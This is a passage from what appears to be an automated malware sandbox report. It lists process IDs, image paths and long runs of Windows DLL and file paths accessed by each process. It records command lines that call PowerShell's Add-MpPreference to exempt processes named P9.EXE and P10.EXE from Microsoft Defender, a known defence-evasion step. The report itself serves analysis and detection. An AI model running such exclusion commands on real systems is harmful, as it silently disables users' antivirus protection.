C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\B1C511D8FAD78AD3C5213B2B4FB02B8B\MICROSOFT.POWERSHELL.CONSOLEHOST.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.CONSOLEHOST\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT.AUTOMATION\1.0.0.0__31BF3856AD364E35\SYSTEM.MANAGEMENT.AUTOMATION.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT.A#\4436815B432C313255AF322F4EC3560D\SYSTEM.MANAGEMENT.AUTOMATION.NI.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\L_INTL.NLS
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTTBLS.NLP
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTKEY.NLP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CORE\FBC05B5B05DC6366B02B8E2F77D080F1\SYSTEM.CORE.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\4F68CD04686E5DC5A55070D112D44BDF\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CORE\3.5.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CONFIGURATIO#\F02737C83305687A68C088927A6C5A98\SYSTEM.CONFIGURATION.INSTALL.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CONFIGURATION.INSTALL\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.WSMAN.MAN#\EE28A075665B6BC23B6DAE56903D431D\MICROSOFT.WSMAN.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.RUNTIME\1.0.0.0__31BF3856AD364E35\MICROSOFT.WSMAN.RUNTIME.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.TRANSACTIONS\AD18F93FC713DB2C4B29B25116C13BD8\SYSTEM.TRANSACTIONS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.TRANSACTIONS\2.0.0.0__B77A5C561934E089\SYSTEM.TRANSACTIONS.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\3008A05E2928E2C1D856CC34E0422C17\MICROSOFT.POWERSHELL.COMMANDS.UTILITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.UTILITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8DF695FB80187F65208D87229E81E8A2\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8CE205027E30804D1B2DEAFFA0582735\MICROSOFT.POWERSHELL.SECURITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.SECURITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CULTURE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORRC.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.XML\461D3B6B3F43E6FBE6C897D5936E17E4\SYSTEM.XML.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.XML\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT\6F3B99ED0B791FF4D8AA52F2F0CD0BCF\SYSTEM.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DIRECTORYSER#\45EC12795950A7D54691591C615A9E3C\SYSTEM.DIRECTORYSERVICES.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.DIRECTORYSERVICES\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\SYSWOW64\SHFOLDER.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\GETEVENT.TYPES.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\TYPES.PS1XML
C:\WINDOWS\SYSWOW64\TZRES.DLL
C:\WINDOWS\SYSWOW64\EN-US\TZRES.DLL.MUI
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DIAGNOSTICS.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\WSMAN.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\CERTIFICATE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DOTNETTYPES.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\FILESYSTEM.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\HELP.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLCORE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLTRACE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\REGISTRY.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\SECUR32.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DATA\1E85062785E286CD9EAE9C26D2C61F73\SYSTEM.DATA.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.DATA\2.0.0.0__B77A5C561934E089\SYSTEM.DATA.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORJIT.DLL
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\PROGRAM FILES\NODEJS
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON37\SCRIPTS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\NPM
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\DIASYMREADER.DLL
C:\WINDOWS\SYSWOW64\NETUTILS.DLL
C:\WINDOWS\SYSTEM32\IMM32.DLL
C:\WINDOWS\SYSTEM32\RPCSS.DLL
C:\WINDOWS\SYSTEM32\CRYPTBASE.DLL
C:\WINDOWS\SYSTEM32\SECHOST.DLL
C:\WINDOWS\SYSTEM32\AUTHUI.DLL
C:\WINDOWS\SYSTEM32\CRYPTUI.DLL
C:\WINDOWS\WINSXS\AMD64_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_FA396087175AC9AC\COMCTL32.DLL
C:\WINDOWS\SYSTEM32\UXTHEME.DLL
C:\WINDOWS\WINSXS\AMD64_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_2B24536C71ED437A\GDIPLUS.DLL
C:\WINDOWS\SYSTEM32\DUI70.DLL
C:\WINDOWS\SYSTEM32\DUSER.DLL
C:\WINDOWS\SYSTEM32\EN-US\AUTHUI.DLL.MUI
C:\WINDOWS\SYSTEM32\SNDVOLSSO.DLL
C:\WINDOWS\SYSTEM32\HID.DLL
C:\WINDOWS\SYSTEM32\MMDEVAPI.DLL
C:\WINDOWS\SYSTEM32\PROPSYS.DLL
C:\WINDOWS\SYSTEM32\EN-US\SETUPAPI.DLL.MUI
C:\WINDOWS\SYSTEM32\DWMAPI.DLL
C:\WINDOWS\SYSTEM32\XMLLITE.DLL
C:\WINDOWS\SYSTEM32\IMAGERES.DLL
C:\WINDOWS\SYSTEM32\WINDOWSCODECS.DLL
C:\WINDOWS\SYSTEM32\WINBRAND.DLL
C:\WINDOWS\BRANDING\BASEBRD\BASEBRD.DLL
C:\WINDOWS\BRANDING\BASEBRD\EN-US\BASEBRD.DLL.MUI
C:\WINDOWS\SYSTEM32\WTSAPI32.DLL
C:\WINDOWS\SYSTEM32\VAULTCREDPROVIDER.DLL
C:\WINDOWS\SYSTEM32\RPCRTREMOTE.DLL
C:\WINDOWS\SYSTEM32\SMARTCARDCREDENTIALPROVIDER.DLL
C:\WINDOWS\SYSTEM32\WINSTA.DLL
C:\WINDOWS\SYSTEM32\BIOCREDPROV.DLL
C:\WINDOWS\SYSTEM32\SECUR32.DLL
C:\WINDOWS\SYSTEM32\SSPICLI.DLL
C:\WINDOWS\SYSTEM32\WINBIO.DLL
C:\WINDOWS\SYSTEM32\CREDUI.DLL
C:\WINDOWS\SYSTEM32\VAULTCLI.DLL
C:\WINDOWS\SYSTEM32\NETAPI32.DLL
C:\WINDOWS\SYSTEM32\NETUTILS.DLL
C:\WINDOWS\SYSTEM32\SRVCLI.DLL
C:\WINDOWS\SYSTEM32\WKSCLI.DLL
C:\WINDOWS\SYSTEM32\SAMCLI.DLL
C:\WINDOWS\WIN.INI
C:\WINDOWS\SYSTEM32\CERTCREDPROVIDER.DLL
C:\WINDOWS\SYSTEM32\RASPLAP.DLL
C:\WINDOWS\SYSTEM32\RASAPI32.DLL
C:\WINDOWS\SYSTEM32\RASMAN.DLL
C:\WINDOWS\SYSTEM32\RTUTILS.DLL
C:\WINDOWS\SYSTEM32\INPUT.DLL
C:\WINDOWS\SYSTEM32\EN-US\INPUT.DLL.MUI
C:\WINDOWS\SYSTEM32\CRYPTSP.DLL
C:\WINDOWS\SYSTEM32\RSAENH.DLL
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\INK\TIPTSF.DLL
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\INK\EN-US\TIPTSF.DLL.MUI
C:\WINDOWS\IME\SPTIP.DLL
C:\WINDOWS\IME\EN-US\SPTIP.DLL.MUI
C:\PROGRAM FILES\WINDOWS NT\TABLETEXTSERVICE\TABLETEXTSERVICE.DLL
C:\PROGRAM FILES\WINDOWS NT\TABLETEXTSERVICE\EN-US\TABLETEXTSERVICE.DLL.MUI
C:\WINDOWS\SYSTEM32\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\SYSTEM32\EN-US\MSCTF.DLL.MUI
C:\WINDOWS\SYSTEM32\OLEACC.DLL
C:\WINDOWS\SYSTEM32\OLEACCRC.DLL
C:\WINDOWS\SYSTEM32\UIAUTOMATIONCORE.DLL
C:\WINDOWS\SYSTEM32\SXS.DLL
3384
Image path
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P9.EXE'"
Time lapse
6.360986
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\WINBRAND.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\EN-US\CMD.EXE.MUI
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
Process children
3404
Image path
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P9.EXE'"
Time lapse
6.438987
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\ATL.DLL
C:\WINDOWS\SYSWOW64\MSCOREE.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\EN-US\POWERSHELL.EXE.MUI
C:\WINDOWS\SYSWOW64\UXTHEME.DLL
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSWOW64\SHELL32.DLL
C:\WINDOWS\SYSWOW64\USERENV.DLL
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_41E6975E2BD6F2B2\COMCTL32.DLL
C:\WINDOWS\WINDOWSSHELL.MANIFEST
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\PROPSYS.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\CVERSIONS.1.DB
C:\WINDOWS\SYSWOW64\NTMARTA.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.VER0X0000000000000001.DB
C:\USERS\DESKTOP.INI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\USERS\ADMINISTRATOR\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SHELL32.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\SYSWOW64\GAMEUX.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_72D18A4386696C80\GDIPLUS.DLL
C:\WINDOWS\SYSWOW64\XMLLITE.DLL
C:\WINDOWS\SYSWOW64\WER.DLL
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\DESKTOP.INI
C:\WINDOWS\SYSWOW64\SHDOCVW.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSWOW64\EN-US\SHDOCVW.DLL.MUI
C:\WINDOWS\SYSWOW64\LINKINFO.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\DESKTOP.INI
C:\WINDOWS\SYSWOW64\NTSHRUI.DLL
C:\WINDOWS\SYSWOW64\SRVCLI.DLL
C:\WINDOWS\SYSWOW64\CSCAPI.DLL
C:\WINDOWS\SYSWOW64\SLC.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\WINDOWS POWERSHELL.LNK
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL_ISE.EXE
C:\WINDOWS\HH.EXE
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\NKPN2J4M4SBW90ICH9PK.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFBD26.TMP
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORWKS.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CLR.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.VC80.CRT_1FC8B3B9A1E18E3B_8.0.50727.4940_NONE_D08CC06A442B34FC\MSVCR80.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CONFIG\MACHINE.CONFIG
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\INDEX149.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MSCORLIB\62A0B3E4B40EC0E8C5CFAA0C8848E64A\MSCORLIB.NI.DLL
C:\WINDOWS\ASSEMBLY\PUBPOL25.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM\9E0A3B9B9F457233A335D7FBA8F95419\SYSTEM.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\B1C511D8FAD78AD3C5213B2B4FB02B8B\MICROSOFT.POWERSHELL.CONSOLEHOST.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.CONSOLEHOST\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT.AUTOMATION\1.0.0.0__31BF3856AD364E35\SYSTEM.MANAGEMENT.AUTOMATION.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT.A#\4436815B432C313255AF322F4EC3560D\SYSTEM.MANAGEMENT.AUTOMATION.NI.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\L_INTL.NLS
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTTBLS.NLP
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTKEY.NLP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CORE\FBC05B5B05DC6366B02B8E2F77D080F1\SYSTEM.CORE.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\4F68CD04686E5DC5A55070D112D44BDF\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CORE\3.5.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CONFIGURATIO#\F02737C83305687A68C088927A6C5A98\SYSTEM.CONFIGURATION.INSTALL.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CONFIGURATION.INSTALL\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.WSMAN.MAN#\EE28A075665B6BC23B6DAE56903D431D\MICROSOFT.WSMAN.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.RUNTIME\1.0.0.0__31BF3856AD364E35\MICROSOFT.WSMAN.RUNTIME.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.TRANSACTIONS\AD18F93FC713DB2C4B29B25116C13BD8\SYSTEM.TRANSACTIONS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.TRANSACTIONS\2.0.0.0__B77A5C561934E089\SYSTEM.TRANSACTIONS.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\3008A05E2928E2C1D856CC34E0422C17\MICROSOFT.POWERSHELL.COMMANDS.UTILITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.UTILITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8DF695FB80187F65208D87229E81E8A2\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8CE205027E30804D1B2DEAFFA0582735\MICROSOFT.POWERSHELL.SECURITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.SECURITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CULTURE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORRC.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.XML\461D3B6B3F43E6FBE6C897D5936E17E4\SYSTEM.XML.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.XML\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT\6F3B99ED0B791FF4D8AA52F2F0CD0BCF\SYSTEM.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DIRECTORYSER#\45EC12795950A7D54691591C615A9E3C\SYSTEM.DIRECTORYSERVICES.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.DIRECTORYSERVICES\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\SYSWOW64\SHFOLDER.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\GETEVENT.TYPES.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\TYPES.PS1XML
C:\WINDOWS\SYSWOW64\TZRES.DLL
C:\WINDOWS\SYSWOW64\EN-US\TZRES.DLL.MUI
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DIAGNOSTICS.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\WSMAN.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\CERTIFICATE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DOTNETTYPES.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\FILESYSTEM.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\HELP.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLCORE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLTRACE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\REGISTRY.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\SECUR32.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DATA\1E85062785E286CD9EAE9C26D2C61F73\SYSTEM.DATA.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.DATA\2.0.0.0__B77A5C561934E089\SYSTEM.DATA.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORJIT.DLL
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\PROGRAM FILES\NODEJS
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON37\SCRIPTS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\NPM
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\DIASYMREADER.DLL
C:\WINDOWS\SYSWOW64\NETUTILS.DLL
3392
Image path
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P10.EXE'"
Time lapse
6.392187
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\WINBRAND.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\EN-US\CMD.EXE.MUI
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
Process children
3412
Image path
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P10.EXE'"
Time lapse
6.485786
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\ATL.DLL
C:\WINDOWS\SYSWOW64\MSCOREE.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\EN-US\POWERSHELL.EXE.MUI
C:\WINDOWS\SYSWOW64\UXTHEME.DLL
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSWOW64\SHELL32.DLL
C:\WINDOWS\SYSWOW64\USERENV.DLL
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_41E6975E2BD6F2B2\COMCTL32.DLL
C:\WINDOWS\WINDOWSSHELL.MANIFEST
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\PROPSYS.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\CVERSIONS.1.DB
C:\WINDOWS\SYSWOW64\NTMARTA.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.VER0X0000000000000001.DB
C:\USERS\DESKTOP.INI
